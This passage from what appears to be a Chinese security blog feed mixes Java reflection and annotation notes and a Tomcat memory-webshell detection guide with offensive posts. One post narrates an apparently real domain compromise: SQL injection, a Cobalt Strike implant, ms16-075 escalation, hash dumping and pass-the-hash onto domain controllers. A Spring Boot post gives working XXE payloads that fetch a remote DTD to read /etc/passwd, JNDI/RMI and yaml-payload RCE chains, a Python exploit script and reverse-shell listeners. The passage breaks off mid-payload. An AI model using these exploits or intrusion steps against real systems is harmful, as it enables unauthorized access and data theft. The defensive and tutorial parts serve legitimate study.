import java.lang.reflect.Proxy;

public class Proxyhandler implements InvocationHandler {

    //被代理的接口

    Rent rent;
    public void setRent(Rent rent){
        this.rent = rent;
    }

    //生成得到代理类

    public Object getProxy(){
        return Proxy.newProxyInstance(this.getClass().getClassLoader(),rent.getClass().getInterfaces(),this);
    }

    // 处理代理实例，并返回结果

    public Object invoke(Object proxy, Method method,Object[] args) throws Throwable{
        Object result = method.invoke(rent,args);
        return result;
    }
}
</code></pre>
<ul>
<li>客户端（客户）角色</li>
</ul>
<pre><code class="line-numbers">import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class Clent {

    public static void main(String[] args) {
        //真实角色
        Host host = new Host();
        //代理角色

        Proxyhandler pih = new Proxyhandler();
        //通过调用程序处理角色来处理要调用的接口角色

        pih.setRent(host);

        Rent proxy = (Rent) pih.getProxy();

        proxy.rent();
    }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200902164704.png" alt="" /></p>
<h2>注解（Java.Annotation）</h2>
<ul>
<li>格式</li>
</ul>
<pre><code class="line-numbers">@注释名
</code></pre>
<ul>
<li>内置注解</li>
</ul>
<pre><code class="line-numbers">@Override
</code></pre>
<p><strong>定义在java.lang.Override中，表示重写</strong></p>
<pre><code class="line-numbers">Deprecated 
</code></pre>
<p><strong>定义在java.lang.Deprecated中，表示废弃，不鼓励使用，使用时会多一条横线，但依旧可以使用</strong></p>
<p><img src="/wp-content/uploads/2020/10/20200830182027.png" alt="" /></p>
<pre><code class="line-numbers">@SuppressWarnings 
</code></pre>
<p><strong>定义在java.lang.SuppressWarnings中，用来抑制编译时的警告信息</strong></p>
<p>使用前</p>
<p><img src="/wp-content/uploads/2020/10/20200830182927.png" alt="" /></p>
<p>使用后</p>
<p><img src="/wp-content/uploads/2020/10/20200830182950.png" alt="" /></p>
<h3>元注解</h3>
<ul>
<li>作用</li>
</ul>
<p><strong>注解其他注解</strong></p>
<ul>
<li>@Target(用于描述注解的使用范围)</li>
</ul>
<pre><code class="line-numbers">@MYAnnotation
public class ZhuJie {

    @MYAnnotation
    public static void main(String[] args) {

    }


}

//METHOD 方法、TYPE 类
@Target(value = {ElementType.METHOD,ElementType.TYPE})
@interface MYAnnotation{

}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200830185849.png" alt="" /></p>
<ul>
<li>@Retention(表示需要在什么级别保存该注释信息，用来描述注解的生命周期（SOURCE &lt; CLASS &lt; RUNTime）)</li>
</ul>
<pre><code class="line-numbers">@Retention(value = RetentionPolicy.RUNTIME)
</code></pre>
<ul>
<li>@Document(说明该注释将被包含在javadoc中)</li>
<li>@Inherited(说明该子类可以继承父类中的该注解)</li>
</ul>
<h3>自定义注解</h3>
<ul>
<li>@interface(自定义注解关键字)</p>
</li>
<li>
<p>格式</p>
</li>
</ul>
<pre><code class="line-numbers">public @interface 注解名{定义内容}
</code></pre>
<ul>
<li>自定义注解</li>
</ul>
<pre><code class="line-numbers">package ChaBugStudy;


import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;

@Syst1m(Team = "ChaBUg",Founder = "Y4er",brother = "syle")
public class ZhuJie {
    @Syst1m
    public static void main(String[] args) {
        System.out.println("ChaBug.Org");
    }


}


@Target(value = {ElementType.TYPE,ElementType.METHOD})
@Retention(RetentionPolicy.RUNTIME)
@interface Syst1m{

    String Team() default "ChaBug";
    String Founder() default "Y4er";
    String brother() default "Syle";

}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200830192315.png" alt="" /></p>
<h2>反射（Reflection）</h2>
<ul>
<li>正常方式</li>
</ul>
<p><strong>引入需要的“包类”名称-）通过new实例化-〉取得实例化对象</strong></p>
<ul>
<li>反射方式</li>
</ul>
<p><strong>实例化对象->getclass()方法->取得完整的“包类”名称</strong></p>
<ul>
<li>优缺点</li>
</ul>
<p>可以实现动态创建对象和编译，体现出很大的灵活性。</p>
<p>对性能有影响，慢于直接操作</p>
<ul>
<li>主要API</li>
</ul>
<pre><code class="line-numbers">java.lang.class  代表一个类
java.lang.reflect.Method  代表类的方法
java.lang.reflect.Field 代表类的成员变量
java.lang.reflect.Constructor 代表类的构造器
</code></pre>
<ul>
<li>获取class类的几种方式</li>
</ul>
<p><strong>常用方法</strong></p>
<p><img src="/wp-content/uploads/2020/10/20200901184138.png" alt="" /></p>
<pre><code class="line-numbers">package ChaBugStudy;

public class Reflection {
    public static void main(String[] args) throws ClassNotFoundException {
        Person person = new Student();

        //方式一：通过对象获得
        Class c1 = person.getClass();
        System.out.println(c1.hashCode());

        //方式二：forname获得

        Class c2 = Class.forName("ChaBugStudy.Person");
        System.out.println(c2.hashCode());

        //方式三 通过类名.class

        Class c3 = Person.class;
        System.out.println(c3.hashCode());

        //方式四 内置类型的包装类

        Class c4 = Integer.TYPE;
        System.out.println(c4.hashCode());

        //获取父类

        Class c5 = c1.getSuperclass();
        System.out.println(c5.hashCode());

    }
}

class Person{
    String name;

    public Person(){

    }

    public Person(String name){

    }

    @Override
    public String toString(){
        return name;
    }
}

class Student extends Person{
    public Student(){
        this.name = "学生";
        }
}


class Teacher extends Person{
    public Teacher(){
        this.name = "老师";
        }
}
</code></pre>
<p><img src="/wp-content/uploads/2020/10/20200901201630.png" alt="" /></p>
<ul>
<li>哪些类型可以有Class对象</li>
</ul>
<p>**<br />
class<br />
interface接口<br />
[]数组<br />
enum枚举<br />
注解@interface<br />
基本数据类型<br />
void<br />
**</p>
<pre><code class="line-numbers">    Class c1 = Object c1 = Object.class; //类
    Class c2 = Comparable.class; //接口
    Class c3 = String[].class; //数组
    Class c4 = Override.class; //注解
    Class c5= ElementType.class; // 枚举
    Class c6 = Integer.class; // 基本数据
    Class c7 = void.class; //void
    Class c8 = Class.class; //CLass
</code></pre>
<ul>
<li>获取运行时类的完整结构</li>
</ul>
<p><strong>获取类的名字</strong></p>
<pre><code class="line-numbers">c1.getName() 获取包名加类名
c1.getSimpleName() 获得类名
</code></pre>
<p><strong>获得类的属性</strong></p>
<pre><code class="line-numbers">Field[] field = c1.getFields() 只能获取public属性
fields = c1.getDeclaredFields() 找到全部的属性
</code></pre>
<p><strong>获得指定属性的值</strong></p>
<pre><code class="line-numbers">Field name = c1.getDeclaredField("name")
</code></pre>
<p><strong>获得类的方法</strong></p>
<pre><code class="line-numbers">Method[] methods = c1.getMethods(); 获得本类以及父类的全部public方法

methods = c1.getDeclaredMethods(); 获得本类的所有方法
</code></pre>
<p><strong>获得指定方法</strong></p>
<pre><code class="line-numbers">Method getname = c1.getMethod("getname",null)
Method serName = c1.getMethod("setname",String.class)
</code></pre>
<p><strong>获得构造器</strong></p>
<pre><code class="line-numbers">Constructor[] constructors = c1.getConstructors();
for (Constructor constructor:constructors){
    System.out.println(construcior)}

constructors = c1.getDeclaredConstructors();
</code></pre>
<p><strong>获得指定构造器</strong></p>
<pre><code class="line-numbers">c1.getDeclaredConstructor(String.class,int.class)
</code></pre>
<ul>
<li>动态创建对象执行方法</li>
</ul>
<p><strong>获得对象</strong></p>
<pre><code class="line-numbers">Class c1 = Class.forname("XXX")
</code></pre>
<p><strong>构造对象</strong></p>
<pre><code class="line-numbers">User user = (User) c1.nerInstance(); 无参构造器
</code></pre>
<p>通过构造器创建对象</p>
<pre><code class="line-numbers">Constructor constructor = c1.getDeclaredConstructor(String.class)
User user2 = (USer)constructor.nerInstance("Syst1m")
</code></pre>
<p><strong>反射调用普通方法</strong></p>
<pre><code class="line-numbers">User user3 = (User)c1.nerInstance();
Method serName = c1.getDeclaredMethod("setName",Strind.class);
setName.invoke(User3,"syst1m");
</code></pre>
<p><strong>反射操作属性</strong></p>
<p>不能直接操作私有属性，需要关闭安全检测</p>
<pre><code class="line-numbers">User user4 = (User)c1.nerInstance();
Field name = c1.getDeclaredFields();

name.setAccessible(true) //关闭权限检测
name.set(User4,"syst1m");
</code></pre>
<ul>
<li>参考</li>
</ul>
<pre><code class="line-numbers">https://blog.csdn.net/lililuni/article/details/83449088
</code></pre>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>[防守视角] tomcat内存马的多种查杀方式</title>
		<link>/tools/1873.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Tue, 15 Sep 2020 16:00:36 +0000</pubDate>
				<category><![CDATA[安全运维]]></category>
		<category><![CDATA[工具分享]]></category>
		<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[免杀]]></category>
		<category><![CDATA[内存shell]]></category>
		<category><![CDATA[护网]]></category>
		<category><![CDATA[查杀]]></category>
		<category><![CDATA[蓝队]]></category>
		<guid isPermaLink="false">/?p=1873</guid>

					<description><![CDATA[环境搭建 我在WINDOWS7虚拟机下搭建的Tomcat，搭建教程网上都有，点击startup.bat启动环境 注入内存马 这里使用了哥斯拉的内存马 查杀方式一：VisualVM（...]]></description>
										<content:encoded><![CDATA[<h1>环境搭建</h1>
<p>我在WINDOWS7虚拟机下搭建的Tomcat，搭建教程网上都有，点击startup.bat启动环境</p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200914221121.png" alt="" /></p>
<p>注入内存马</p>
<p>这里使用了哥斯拉的内存马</p>
<p><img src="/wp-content/uploads/2020/09/20200914234501.png" alt="" /></p>
<h1><span class="wpcom_tag_link"><a href="/tags/%e6%9f%a5%e6%9d%80" title="查杀" target="_blank">查杀</a></span>方式一：VisualVM（远程调试）</h1>
<p>设置jstatd.all.policy 文件</p>
<p><img src="/wp-content/uploads/2020/09/20200914221527.png" alt="" /></p>
<p>启动jstatd</p>
<pre><code class="language-txt line-numbers">jstatd.exe -J-Djava.security.policy=jstatd.all.policy -J-Djava.rmi.server.hostname=serverip
</code></pre>
<p><img src="/wp-content/uploads/2020/09/20200914225845.png" alt="" /></p>
<p>设置JVM Connection 修改 catalina.sh文件(LINUX)</p>
<pre><code class="language-txt line-numbers">JAVA_OPTS="-Djava.rmi.server.hostname=服务器的ip
-Dcom.sun.management.jmxremote
-Dcom.sun.management.jmxremote.port=jmx使用的端口
-Dcom.sun.management.jmxremote.ssl=false
-Dcom.sun.management.jmxremote.authenticate=false $JAVA_OPTS"
export JAVA_OPTS
</code></pre>
<p>修改catalina.bat文件(WINDOWS)</p>
<pre><code class="language-txt line-numbers">set JAVA_OPTS=-Djava.rmi.server.hostname=192.168.67.115 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=8888 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
</code></pre>
<p>下载VisualVM</p>
<p><img src="/wp-content/uploads/2020/09/20200914230218.png" alt="" /></p>
<p>MBeans安装插件</p>
<p><img src="/wp-content/uploads/2020/09/20200914230540.png" alt="" /></p>
<p>连接远程Tomcat</p>
<p><img src="/wp-content/uploads/2020/09/20200914234320.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/09/20200915010531.png" alt="" /></p>
<p>检查异常攻击痕迹Filter/Servlet节点</p>
<p><img src="/wp-content/uploads/2020/09/20200915011135.png" alt="" /></p>
<p><strong>在Servlet节点中我发现到了自己设置的内存马test.ico，说明已经检测到了内存马</strong></p>
<h1>查杀方式二：arthas</h1>
<blockquote><p>
  arthas是Alibaba开源的Java诊断工具<br />
  https://github.com/alibaba/arthas
</p></blockquote>
<p>下载</p>
<p><img src="/wp-content/uploads/2020/09/20200915153921.png" alt="" /></p>
<p>文档地址 https://arthas.aliyun.com/doc/quick-start.html</p>
<p><strong>非常Nice的工具，深入用法请查看使用文档，这里只检测探测一下</strong></p>
<p>启动（选择对应tocmat进程pid）</p>
<p><img src="/wp-content/uploads/2020/09/20200915160837.png" alt="" /></p>
<p>mbean(查看 Mbean 的信息，查看异常Filter/Servlet节点)</p>
<pre><code class="language-txt line-numbers">mbean | grep "Servlet"
</code></pre>
<p><img src="/wp-content/uploads/2020/09/20200915161611.png" alt="" /></p>
<p>sc (查看JVM已加载的类信息)</p>
<pre><code class="language-txt line-numbers">sc xxx.* 模糊搜索类
sc -d
</code></pre>
<p><img src="/wp-content/uploads/2020/09/20200915183918.png" alt="" /></p>
<p><strong>查看payload加载的类信息</strong></p>
<p><img src="/wp-content/uploads/2020/09/20200915184214.png" alt="" /></p>
<p><strong>查看x.AES_BASE64类加载的类信息</strong></p>
<p><img src="/wp-content/uploads/2020/09/20200915185544.png" alt="" /></p>
<p>jad(反编译指定已加载类的源码)</p>
<pre><code class="language-txt line-numbers">jad 类名
</code></pre>
<p><img src="/wp-content/uploads/2020/09/20200915174856.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/09/20200915174938.png" alt="" /></p>
<p>还有很多用法值得慢慢学习～</p>
<h1>查杀方式三：Copagent</h1>
<p>由于VisualVM在环境中可能还需要配置JVM Connection远程调试，我在长亭一篇文章中发现了LandGrey师傅所写的内存马检测工具，经过在本地Tomcat测试，可以检测到我自己设置的内存马，而无需重启Tomcat服务（重启了内存马不就没了吗?）先贴上Git地址</p>
<pre><code class="language-txt line-numbers">https://github.com/LandGrey/copagent
</code></pre>
<p>我本地运行Tomcat服务，使用cop.jar工具，工具首先会识别你正在运行的应用列举出来由你自己选择ID，运行后会在.copagent目录生成结果</p>
<p><img src="/wp-content/uploads/2020/09/20200915005424.png" alt="" /></p>
<p>在输出结果中，可以查看异常类，例如我的<code>1.jsp</code>和<code>X.AES_BASE64</code>，他会显示所有运行的类以及危险等级，比较高的可以进入目录查看代码进行分析</p>
<p><img src="/wp-content/uploads/2020/09/20200915121700.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/09/20200915005447.png" alt="" /></p>
<p>在java或class文件夹会保存木马以及运行的类</p>
<p><img src="/wp-content/uploads/2020/09/20200915121748.png" alt="" /></p>
<p><img src="/wp-content/uploads/2020/09/20200915122054.png" alt="" /></p>
<h1>参考</h1>
<ol>
<li>https://mp.weixin.qq.com/s/DRbGeVOcJ8m9xo7Gin45kQ</li>
<li>https://qiita.com/shimizukawasaki/items/5dc9fe780ffbf3a7699c</li>
</ol>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>一次平淡无奇的域渗透</title>
		<link>/web/1823.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Fri, 07 Aug 2020 02:45:16 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<guid isPermaLink="false">/?p=1823</guid>

					<description><![CDATA[这是一次很普通的渗透过程，好兄弟撕夜于网站上发现了SQL注入，为一处登陆处的注入，注入点为用户名或密码。说着我们复制了post包放入sqlmap目录下，直接来一发 -r 注入 PO...]]></description>
										<content:encoded><![CDATA[<p><strong>这是一次很普通的渗透过程，好兄弟撕夜于网站上发现了SQL注入，为一处登陆处的注入，注入点为用户名或密码。说着我们复制了post包放入sqlmap目录下，直接来一发 -r</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806215003.png" alt="" /></p>
<ul>
<li>注入</li>
</ul>
<pre><code class="line-numbers">POST /XXXXXX/XXX/Login.asp HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://target.com/
Connection: close
Name=admin*&amp;PassWord=asdasd
</code></pre>
<p><strong>我们发现支持堆叠注入，直接使用cs生成pscommand于os-shell中执行，上线到cs上便于操作。</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806213001.png" alt="" /></p>
<ul>
<li>Cobalt Strike</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806170834.png" alt="" /></p>
<p><strong>我们进入命令行发现机器为域内机器，为普通用户，所以首先第一步想要把权限提升至高权限用户</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806171436.png" alt="" /></p>
<p><strong>查看系统补丁情况，到补丁缺少查询网站查询，发现缺少ms16-075，到github中下载对应的提取插件，使用插件进行权限提升，成功将权限提升至system权限</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806213748.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806171907.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806172346.png" alt="" /></p>
<p><strong>查看了域内机器情况，发现有名为AD1、AD2、AD3的一台主控，两台辅控机器</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806213951.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806173031.png" alt="" /></p>
<p><strong>在当前已经提升了权限的高权限下dump hash，获取到部分用户账户，这时候一个惊喜发生了，就是通过dump hash发现了域管的账号情况，这不是美滋滋吗</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806173723.png" alt="" /></p>
<p><strong>但是首先我们将shell注入到了其他进程，万一一下掉了呢对吧</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806173827.png" alt="" /></p>
<p><strong>接下来进行pth，使用已经获取的域管账号hash对其他机器进行移动，首先就是AD1的域控</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806174332.png" alt="" /></p>
<p><strong>成功获取到了AD1域控的SYSTEM权限</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806174556.png" alt="" /></p>
<p><strong>于AD1上进行dump hash</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806174814.png" alt="" /></p>
<p><strong>将域管账号对其他机器进行批量pth，梭哈就完事了</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806221913.png" alt="" /><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806215338.png" alt="" /></p>
<p><strong>最后获得了三台AD，mail，file一些权限，然后就去看电视了</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200806194313.png" alt="" /></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Spring Boot漏洞复现</title>
		<link>/web/1795.html</link>
		
		<dc:creator><![CDATA[syst1m]]></dc:creator>
		<pubDate>Mon, 01 Jun 2020 03:18:07 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<guid isPermaLink="false">/?p=1795</guid>

					<description><![CDATA[复现一下Sprint Boot的一些漏洞 环境搭建 Dump环境 Mvn构建项目 启动项目 端点信息 路径 描述 /autoconfig 提供了一份自动配置报告，记录哪些自动配置条...]]></description>
										<content:encoded><![CDATA[<p><em>复现一下Sprint Boot的一些漏洞</em></p>
<ul>
<li>环境搭建</li>
</ul>
<p><em>Dump环境</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521132309.png" alt="" /></p>
<p><em>Mvn构建项目</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521132421.png" alt="" /></p>
<p><em>启动项目</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521135810.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521162025.png" alt="" /></p>
<ul>
<li>端点信息</li>
</ul>
<pre><code class="line-numbers">路径            描述
/autoconfig    提供了一份自动配置报告，记录哪些自动配置条件通过了，哪些没通过
/beans         描述应用程序上下文里全部的Bean，以及它们的关系
/env           获取全部环境属性
/configprops   描述配置属性(包含默认值)如何注入Bean
/dump          获取线程活动的快照
/health        报告应用程序的健康指标，这些值由HealthIndicator的实现类提供
/info          获取应用程序的定制信息，这些信息由info打头的属性提供
/mappings      描述全部的URI路径，以及它们和控制器(包含Actuator端点)的映射关系
/metrics       报告各种应用程序度量信息，比如内存用量和HTTP请求计数
/shutdown      关闭应用程序，要求endpoints.shutdown.enabled设置为true
/trace         提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)
</code></pre>
<ul>
<li>Spring Boot 1.x版本端点在根URL下注册</li>
</ul>
<p><em>2.x版本端点移动到/actuator/路径</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521215258.png" alt="" /></p>
<h2>Jolokia漏洞利用</h2>
<h3>Jolokia漏洞利用（XXE）</h3>
<ul>
<li>jolokia/list</li>
</ul>
<p><strong>查看jolokia/list中存在的 Mbeans，是否存在logback 库提供的reloadByURL方法</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521215727.png" alt="" /></p>
<ul>
<li>创建logback.xml和fileread.dtd文件</li>
</ul>
<p><strong>logback.xml</strong></p>
<pre><code class="line-numbers">&lt;?xml version="1.0" encoding="utf-8" ?&gt;
&lt;!DOCTYPE a [ &lt;!ENTITY % remote SYSTEM "http://x.x.x.x/fileread.dtd"&gt;%remote;%int;]&gt;
&lt;a&gt;&amp;trick;&lt;/a&gt;
</code></pre>
<p><strong>fileread.dtd</strong></p>
<pre><code class="line-numbers">&lt;!ENTITY % d SYSTEM "file:///etc/passwd"&gt;
&lt;!ENTITY % int "&lt;!ENTITY trick SYSTEM ':%d;'&gt;"&gt;
</code></pre>
<ul>
<li>将文件上传到公网VPS上并且开启http服务</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521221754.png" alt="" /></p>
<ul>
<li>远程访问logback.xml文件</li>
</ul>
<p><strong>127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml</strong></p>
<ul>
<li>成功利用xxe读取到etc/passwd文件内容</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521221839.png" alt="" /></p>
<h3>Jolokia漏洞利用（RCE）</h3>
<ul>
<li>下载修改RMI服务代码</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521223234.png" alt="" /></p>
<ul>
<li>编译打包</li>
</ul>
<pre><code class="line-numbers">mvn clean install
</code></pre>
<p><em>打包成功后创建target目录下生成RMIServer-0.1.0.jar文件</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521225708.png" alt="" /></p>
<ul>
<li>修改logback.xml文件内容</li>
</ul>
<pre><code class="line-numbers"> &lt;configuration&gt;
  &lt;insertFromJNDI env-entry-name="rmi://x.x.x.x:1097/jndi" as="appName" /&gt;
&lt;/configuration&gt;
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521223544.png" alt="" /></p>
<ul>
<li>把RMIServer-0.1.0.jar文件上传到公网vps上并执行</li>
</ul>
<pre><code class="line-numbers">java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521225901.png" alt="" /></p>
<ul>
<li>nc监听</li>
</ul>
<pre><code class="line-numbers">nc -lvp 6666
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521225957.png" alt="" /></p>
<ul>
<li>漏洞url上访问</li>
</ul>
<pre><code class="line-numbers">http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/xxx.xxx.xxx.xxx!/logback.xml
</code></pre>
<ul>
<li>反弹shell</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521231326.png" alt="" /></p>
<h3>Jolokia漏洞利用（RCE-createJNDIRealm方法）</h3>
<blockquote><p>
  查看/jolokia/list 中存在的是否存在org.apache.catalina.mbeans.MBeanFactory类提供的createJNDIRealm方法，可能存在JNDI注入，导致远程代码执行
</p></blockquote>
<ul>
<li>python执行脚本</li>
</ul>
<pre><code class="line-numbers">import requests as req
import sys
from pprint import pprint

url = sys.argv[1] + "/jolokia/"
pprint(url)
#创建JNDIRealm
create_JNDIrealm = {
    "mbean": "Tomcat:type=MBeanFactory",
    "type": "EXEC",
    "operation": "createJNDIRealm",
    "arguments": ["Tomcat:type=Engine"]
}
#写入contextFactory
set_contextFactory = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "contextFactory",
    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"
}
#写入connectionURL为自己公网RMI service地址
set_connectionURL = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "WRITE",
    "attribute": "connectionURL",
    "value": "rmi://x.x.x.x:1097/jndi"
}
#停止Realm
stop_JNDIrealm = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "stop",
    "arguments": []
}
#运行Realm，触发JNDI 注入
start = {
    "mbean": "Tomcat:realmPath=/realm0,type=Realm",
    "type": "EXEC",
    "operation": "start",
    "arguments": []
}

expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]

for i in expoloit:
    rep = req.post(url, json=i)
    pprint(rep.json())

</code></pre>
<ul>
<li>运行RMI服务</li>
</ul>
<pre><code class="line-numbers">java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522174149.png" alt="" /></p>
<ul>
<li>nc 监听</li>
</ul>
<pre><code class="line-numbers">nc -lvp 6666
</code></pre>
<ul>
<li>python发送请求</li>
</ul>
<pre><code class="line-numbers">python exp.py http://127.0.0.1:8090/
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522174426.png" alt="" /></p>
<ul>
<li>反弹shell</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521231326.png" alt="" /></p>
<h2>env端点利用</h2>
<h3>SpringBoot env 获取* 敏感信息</h3>
<blockquote><p>
  如果Spring Cloud Libraries在路径中，则&#8217;/env&#8217;端点会默认允许修改Spring环境属性。 “@ConfigurationProperties”的所有bean都可以进行修改和重新绑定。
</p></blockquote>
<ul>
<li>例如要获取PID（这是假设，假设PID为**）</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200521232802.png" alt="" /></p>
<ul>
<li>修改enveureka.client.serviceUrl.defaultZone属性</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522142507.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522165111.png" alt="" /></p>
<ul>
<li>nc监听</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522145420.png" alt="" /></p>
<ul>
<li>refresh</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522165141.png" alt="" /></p>
<ul>
<li>base64解码获取属性</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522165333.png" alt="" /></p>
<h3>spring Cloud env yaml利用</h3>
<blockquote><p>
  当spring boot使用Spring Cloud 相关组件时，会存在spring.cloud.bootstrap.location属性，通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE
</p></blockquote>
<ul>
<li>利用范围</li>
</ul>
<p><strong>Spring Boot 2.x 无法利用成功<br />
Spring Boot 1.5.x 在使用 Dalston 版本时可利用成功，使用 Edgware 无法成功<br />
Spring Boot &lt;= 1.4 可利用成功</strong></p>
<ul>
<li>下载exp修改执行命令</li>
</ul>
<pre><code class="line-numbers">https://github.com/artsploit/yaml-payload
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522180648.png" alt="" /></p>
<ul>
<li>将java文件进行编译</li>
</ul>
<pre><code class="line-numbers">javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522180846.png" alt="" /></p>
<ul>
<li>创建yaml文件并放到公网</li>
</ul>
<pre><code class="line-numbers"> !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[
!!java.net.URL ["http://xxx.xxx.xxx.xxx:8000/yaml-payload.jar"] ]]
]
</code></pre>
<ul>
<li>修改 spring.cloud.bootstrap.location为外部 yml 配置文件地址</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522182158.png" alt="" /></p>
<ul>
<li>请求 /refresh 接口触发</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522181825.png" alt="" /></p>
<ul>
<li>执行命令成功</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200522182248.png" alt="" /></p>
<h3>xstream反序列化</h3>
<ul>
<li>前提条件</li>
</ul>
<p><strong>Eureka-Client &lt;1.8.7（多见于Spring Cloud Netflix）</strong></p>
<ul>
<li>在VPS创建xstream文件，使用flask返回application/xml格式数据</li>
</ul>
<pre><code class="line-numbers">from flask import Flask, Response

app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/&lt;path:path&gt;', methods = ['GET', 'POST'])
def catch_all(path):
    xml = """&lt;linked-hash-set&gt;
  &lt;jdk.nashorn.internal.objects.NativeString&gt;
